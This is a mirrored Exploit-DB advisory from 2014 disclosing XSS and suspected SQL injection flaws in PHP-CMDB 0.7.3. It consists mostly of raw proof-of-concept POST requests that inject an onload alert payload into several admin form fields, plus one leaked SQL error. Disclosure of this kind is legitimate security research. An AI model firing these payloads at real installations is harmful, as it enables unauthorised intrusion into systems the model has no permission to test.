PHP-CMDB 0.7.3 – Multiple Vulnerabilities

• Exploit Database
• 105 阅读

• 作者： HauntIT
  日期： 2014-02-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/31970/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78

  # ============================================================== # Title ...| Multiple vulnerabilities in PHP-CMDB # Version .| php-cmdb_0.7.3 # Date ....| 27.02.2014 # Found ...| HauntIT Blog # Home ....| # ==============================================================   [+] From admin logged-in   # ============================================================== # 1. XSS in SQL error   ---<request>--- POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/index.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 57   s_text=&apos;%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_form=1 ---<request>---     ---<response>--- <td colspan=&apos;2&apos; class=&apos;c_attr r_attr&apos;>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &apos;"><body/onload=alert(9999)>%&apos; AND ci_cit_id=cit_id ORDER BY ci_title, cit_title&apos; at line 1</td> </tr> ---<response>---   Same parameter seems to be vulnerable to SQL Injection attack. ("The used SELECT statements have a different number of columns")   # ============================================================== # 2. XSS   ---<request>--- POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/ci_create.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 93   ci_id=0&ci_clone_id=0&ci_icon=&apos;%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&ci_form=1&ci_cit_id=0 ---<request>---       # ============================================================== # 3. XSS /SQLi   ---<request>--- POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/search_advanced.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 100   s_form=2&s_text=&apos;%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_cit_id=0&s_cat_id=0&s_compare_operator=0 ---<request>---     # ============================================================== # 4. XSS / SQLi   ---<request>--- POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/u_create_run.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 153   u_id=0&u_form=1&u_login=&apos;%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&u_active=1&u_last_name=tester&u_first_name=tester&u_role_id=1&u_email=&u_auth_backend=0 ---<request>---       # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) # o/